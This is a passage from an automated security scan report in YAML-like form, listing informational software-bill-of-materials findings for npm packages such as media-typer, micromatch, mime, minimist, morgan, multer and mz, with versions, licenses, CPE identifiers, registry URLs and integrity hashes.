priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9efbed3ea63ec0cc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: media-engine 1.0.3' title: media-engine 1.0.3 description: 'Package discovered: media-engine 1.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1dbf081258d17462 name: media-engine version: 1.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:media-engine:media-engine:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media-engine:media_engine:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media_engine:media-engine:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media_engine:media_engine:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media:media-engine:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media:media_engine:1.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/media-engine@1.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/media-engine/-/media-engine-1.0.3.tgz integrity: sha512-aa5tG6sDoK+k70B9iEX1NeyfT8ObCKhNDs6lJVpwF6r8vhUfuKMslIcirq6HIUYuuUYLefcEQOn9bSBOvawtwg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6ecc4376357a6aa5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: media-typer 0.3.0' title: media-typer 0.3.0 description: 'Package discovered: media-typer 0.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d88fe6586764efc9 name: media-typer version: 0.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:media-typer:media-typer:0.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media-typer:media_typer:0.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media_typer:media-typer:0.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media_typer:media_typer:0.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media:media-typer:0.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:media:media_typer:0.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/media-typer@0.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz integrity: sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d32acd7a2e9bf402 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: merge-descriptors 1.0.3' title: merge-descriptors 1.0.3 description: 'Package discovered: merge-descriptors 1.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 670d71ff9d8ed75e name: merge-descriptors version: 1.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:merge-descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:merge-descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:merge_descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:merge_descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:merge:merge-descriptors:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:merge:merge_descriptors:1.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/merge-descriptors@1.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz integrity: sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b81185034826e168 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: merge2 1.4.1' title: merge2 1.4.1 description: 'Package discovered: merge2 1.4.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 49cc3c07a1505404 name: merge2 version: 1.4.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:merge2:merge2:1.4.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/merge2@1.4.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz integrity: sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b23a5664e0d696ec ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: methods 1.1.2' title: methods 1.1.2 description: 'Package discovered: methods 1.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a17abee1ae67ac79 name: methods version: 1.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:methods:methods:1.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/methods@1.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/methods/-/methods-1.1.2.tgz integrity: sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e5492a26182452ae ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: micromatch 4.0.8' title: micromatch 4.0.8 description: 'Package discovered: micromatch 4.0.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dc31731ddf283ca7 name: micromatch version: 4.0.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jonschlinkert:micromatch:4.0.8:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/micromatch@4.0.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz integrity: sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA== dependencies: braces: ^3.0.3 picomatch: ^2.3.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cdd82acabfa8e9e8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: mime 1.6.0' title: mime 1.6.0 description: 'Package discovered: mime 1.6.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 10b23cab35239c6d name: mime version: 1.6.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:mime_project:mime:1.6.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/mime@1.6.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/mime/-/mime-1.6.0.tgz integrity: sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a724fe9397f99c40 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: mime 3.0.0' title: mime 3.0.0 description: 'Package discovered: mime 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 438a12c55a1c15bf name: mime version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:mime_project:mime:3.0.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/mime@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/mime/-/mime-3.0.0.tgz integrity: sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1454de8382f97ba2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: mime-db 1.52.0' title: mime-db 1.52.0 description: 'Package discovered: mime-db 1.52.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e010d1b3c9ab0c02 name: mime-db version: 1.52.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:mime-db:mime-db:1.52.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime-db:mime_db:1.52.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime_db:mime-db:1.52.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime_db:mime_db:1.52.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime:mime-db:1.52.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime:mime_db:1.52.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/mime-db@1.52.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz integrity: sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c62c037f2c05a588 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: mime-types 2.1.35' title: mime-types 2.1.35 description: 'Package discovered: mime-types 2.1.35' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d035c2d2cba76761 name: mime-types version: 2.1.35 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:mime-types:mime-types:2.1.35:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime-types:mime_types:2.1.35:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime_types:mime-types:2.1.35:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime_types:mime_types:2.1.35:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime:mime-types:2.1.35:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:mime:mime_types:2.1.35:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/mime-types@2.1.35 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz integrity: sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw== dependencies: mime-db: 1.52.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 39275c688371843a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: minimatch 9.0.9' title: minimatch 9.0.9 description: 'Package discovered: minimatch 9.0.9' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dadb042585b0fc99 name: minimatch version: 9.0.9 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:minimatch_project:minimatch:9.0.9:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/minimatch@9.0.9 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz integrity: sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg== dependencies: brace-expansion: ^2.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fe3ea9bf939aec06 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: minimist 1.2.8' title: minimist 1.2.8 description: 'Package discovered: minimist 1.2.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bf8bc4c7577fa757 name: minimist version: 1.2.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:minimist:minimist:1.2.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/minimist@1.2.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz integrity: sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 43d359d2fd9254cd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: minipass 7.1.3' title: minipass 7.1.3 description: 'Package discovered: minipass 7.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a4e62963fcdf0651 name: minipass version: 7.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BlueOak-1.0.0 spdxExpression: BlueOak-1.0.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:minipass:minipass:7.1.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/minipass@7.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 371d68f8a3e92216 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: mkdirp 0.5.6' title: mkdirp 0.5.6 description: 'Package discovered: mkdirp 0.5.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4ee017b1ce1fca30 name: mkdirp version: 0.5.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:mkdirp:mkdirp:0.5.6:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/mkdirp@0.5.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz integrity: sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw== dependencies: minimist: ^1.2.6 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 85ab0a570b2a1b2d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: morgan 1.10.1' title: morgan 1.10.1 description: 'Package discovered: morgan 1.10.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0b0e2e978d7d93f4 name: morgan version: 1.10.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:morgan_project:morgan:1.10.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/morgan@1.10.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/morgan/-/morgan-1.10.1.tgz integrity: sha512-223dMRJtI/l25dJKWpgij2cMtywuG/WiUKXdvwfbhGKBhy1puASqXwFzmWZ7+K73vUPoR7SS2Qz2cI/g9MKw0A== dependencies: basic-auth: ~2.0.1 debug: 2.6.9 depd: ~2.0.0 on-finished: ~2.3.0 on-headers: ~1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 19152fd7179a58f9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ms 2.0.0' title: ms 2.0.0 description: 'Package discovered: ms 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 46f1aa86e531772d name: ms version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:vercel:ms:2.0.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/ms@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ms/-/ms-2.0.0.tgz integrity: sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c6acafac62af1ee0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ms 2.1.3' title: ms 2.1.3 description: 'Package discovered: ms 2.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bb1077662b3cb7e0 name: ms version: 2.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:vercel:ms:2.1.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/ms@2.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ms/-/ms-2.1.3.tgz integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ffedfc57a9f39743 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: multer 1.4.5-lts.2' title: multer 1.4.5-lts.2 description: 'Package discovered: multer 1.4.5-lts.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 775c553ab4f0a485 name: multer version: 1.4.5-lts.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/multer@1.4.5-lts.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/multer/-/multer-1.4.5-lts.2.tgz integrity: sha512-VzGiVigcG9zUAoCNU+xShztrlr1auZOlurXynNvO9GiWD1/mTBbUljOKY+qMeazBqXgRnjzeEgJI/wyjJUHg9A== dependencies: append-field: ^1.0.0 busboy: ^1.0.0 concat-stream: ^1.5.2 mkdirp: ^0.5.4 object-assign: ^4.1.1 type-is: ^1.6.4 xtend: ^4.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9d7c97f3f3cb9ec0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: mz 2.7.0' title: mz 2.7.0 description: 'Package discovered: mz 2.7.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 96c78782a0a6a6e8 name: mz version: 2.7.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:mz:mz:2.7.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/mz@2.7.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/mz/-/mz-2.7.0.tgz integrity: sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q== dependencies: any-promise: ^1.0.0 object-assign: ^4.0.1 thenify-all: ^1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 